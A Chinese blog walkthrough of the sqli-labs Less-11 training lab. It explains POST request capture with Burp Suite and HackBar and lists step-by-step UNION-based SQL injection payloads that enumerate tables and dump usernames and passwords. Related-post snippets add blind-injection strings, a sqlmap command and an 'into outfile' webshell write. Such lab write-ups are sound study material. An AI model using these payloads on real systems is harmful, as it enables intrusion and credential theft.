sqli-labs (less-11)

最新推荐文章于 2024-12-07 22:47:31 发布
原创 最新推荐文章于 2024-12-07 22:47:31 发布 · 3.6k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

sqli-labs (less-11)

补充知识

从第11关开始我们发现跟以前的页面已经完全不一样了,这里要我们输入用户名和密码

假设我们现在注册了一个账号,账号为admin,密码为admin,我们登入进去看看

登入进去之后我们发现屏幕上回显了我们输入的账号和密码,但是url那里却没有返回我们输入的账号和密码,因为前面的关卡我们输入的内容都是以GET方式传输到了服务端,而这里我们输入的账号密码是以POST的方法传输到了服务端

GET请求和POST请求的区别
GET请求:
GET方法用于获取请求页面的指定信息(以实体的格式)。如果请求资源为动态脚本(非HTML),那么返回文本是Web容器解析后的HTML源代码,而不是源文件。
POST请求:
POST方法也与GET方法相似,但最大的区别在于,GET方法没有请求内容,而POST是有请求内容的。POST请求最多用于向服务器发送大量的数据。GET虽然也能发送数据,但是有大小(长度)的限制,并且GET请求会将发送的数据显示在浏览器端,而POST则不会,所以安全性相对来说高一点

所以这里我们的目的就是要抓到以POST请求上传的内容,这里介绍两种方法

使用burpsuite抓包

我们先将账号密码输入到屏幕上,开启burpsuite后点击submit进行抓包

上面红框里面的内容就是我们以POST方式传输上去的内容

使用firefox扩展工具hackbar


我们输入账号密码登入进去以后,先点击Load url,再点击Post data,就可以查看到以POST方式传输上去的内容了


下面我们正式进入less-11

less-11

我们利用hackbar抓到POST包后,像前面的关卡一样我们先在admin的位置试试有没有SQL注入漏洞
我们发现当我们在Post data的位置输入

uname=admin'&passwd=admin&submit=Submit

时,系统报错,证明有SQL注入漏洞,并且为字符型注入

判断字段长度

输入uname=ad' order by 2#&passwd=admin&submit=Submit #回显正常
uname=ad' order by 3#&passwd=admin&submit=Submit #回显错误



判断字段数为2

确定回显位置

uname=ad' union select 1,2#&passwd=admin&submit=Submit


查看当前数据库及当前用户

uname=ad' union select user(),database()#&passwd=admin&submit=Submit


查看security库下的所有表

uname=ad' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#&passwd=admin&submit=Submit


查看users表下的所有字段

uname=ad' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users')#&passwd=admin&submit=Submit


查看username和password字段的值

uname=ad' union select 1,(select group_concat(username,password) from security.users)#&passwd=admin&submit=Submit

sqli-labs less-11 & less-12
water0diamond的博客
03-17 1053
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
sqli-labs(less-11)
m0_59092234的博客
07-31 192
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦。...
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12,sqlilabs less12
SQL注入实例(sqli-labs/less-11
Thewei666的博客
08-06 350
【代码】SQL注入实例(sqli-labs/less-11
SQL-libs Less-11
AgonYAN的博客
07-14 278
SQL-libs Less-11
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1894
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-LabsSQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqlilabs靶场:less-11--less-15
2302_80256359的博客
12-07 833
sqlilabs靶场第11关到第15关通关超详细步骤
sqli-lab-less11
Sa1nZen的博客
08-03 212
sqli-lab-less11
sqli-labs Less-11
qq_42630215的博客
03-26 526
Less-11 POST - Error Based - Single quotes - String 0x01.原页面 检查元素可以看到用户名和密码两个参数分别为uname和passwd 输入正确的用户名和密码 有正确的回显 输入错误的用户名和密码 0x02.判断注入类型 uname=1 passwd=1 uname=1" passwd=1 uname=1’ passwd=1 Yo...
sqli-labs/Less-11
m0_71299382的博客
11-18 276
sqli-labs第十一关
SQLi-LABSLess -11 注入思路以及过程
m0_52513952的博客
02-22 3305
less 11sqli-labs 的第一道 POST 型注入题,因此,我们不能再用之前 GET 型注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
sqli-labssql注入——基础挑战之less11
Eternity18的博客
11-27 834
sqli-labs学习,less11SQL注入
sqli-lab靶场学习(四)——Less11-14(post方法)
sadoshi的专栏
09-20 546
第1-10关都是get方法,本关开始进入post方法。其实post也好get也好,本质都差不多,使用的技巧也基本相同。
Sqli-labsLess-11Less-12
→_→
04-02 1849
Less-11 POST - 基于错误的- 单引号- 字符型 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post类型的,那么post与ge...
SQLi LABS Less-11 联合注入+报错注入_sqli-labs11
2401_86951418的博客
09-12 377
用户名输入:a’ union select 1,2 – a密码随便输入:1。
sqli-labs less-11hackbar实现
最新发布
03-25
### 关于 SQL 注入测试的背景 SQL 注入是一种常见的安全漏洞,攻击者可以通过输入恶意的 SQL 查询语句来操控数据库。`sqli-labs` 是一个用于学习和实践 SQL 注入技术的开源项目,其中 `less-11` 提供了一个基于布尔盲注的学习场景。 为了通过浏览器插件 HackBar 来完成针对 `sqli-labs less-11` 的 SQL 注入测试,可以按照以下方法操作: --- ### 配置环境并启动目标服务 确保已正确安装并运行 `sqli-labs` 环境。访问地址通常为 `http://localhost/sqli-labs/Less-11/` 或其他配置好的路径[^1]。 --- ### 安装与设置 HackBar 插件 HackBar 是一款 Firefox 浏览器扩展工具,能够帮助用户快速修改 HTTP 请求中的参数。以下是具体步骤: #### 下载与启用 下载适用于 Firefox 的 HackBar 扩展,并将其激活以便后续使用。 #### 修改请求数据 打开目标页面后,在表单提交处右键选择 “Inspect Element”,找到对应的 `<form>` 和其子节点 `<input>` 字段。利用 HackBar 工具栏手动编辑这些字段的内容以注入自定义 SQL 语法[^2]。 --- ### 构造有效负载 Payload 对于 `less-11` 场景下的布尔型盲注,需要设计特定条件查询字符串来推断隐藏信息。例如尝试如下 payload: ```sql id=1' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--+ ``` 上述例子会检查当前数据库名称的第一个字符是否大于字母 'a'(ASCII 值为 97),如果返回 true 则表明猜测成立;反之则失败[^3]。 还可以进一步优化成二分查找算法形式加快效率: ```sql id=1' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 1),1,1)) BETWEEN 97 AND 104--+ ``` 此命令将限定范围缩小至 a-h 范围内的可能值[^4]。 --- ### 自动化辅助工具 SqlMap 应用实例 虽然手工构造 payloads 可加深理解原理,但在实际渗透测试工作中推荐借助自动化脚本提升工作效率。下面展示如何调用 Python 版本 sqlmap 对该实验案例发起批量探测: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-11/" --data="id=1" --dbs --level=5 --risk=3 ``` 这里 `-u` 参数指定目标 URL ,而 `--data` 明确指出 POST 方法传递的数据体部分 。另外增加选项如 `--columns`, `--dump` 等可提取更多细节资料。 --- ### 总结注意事项 始终记得合法合规前提下开展任何网络安全研究活动。以上仅作为教育用途分享技巧,请勿非法入侵他人系统! ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值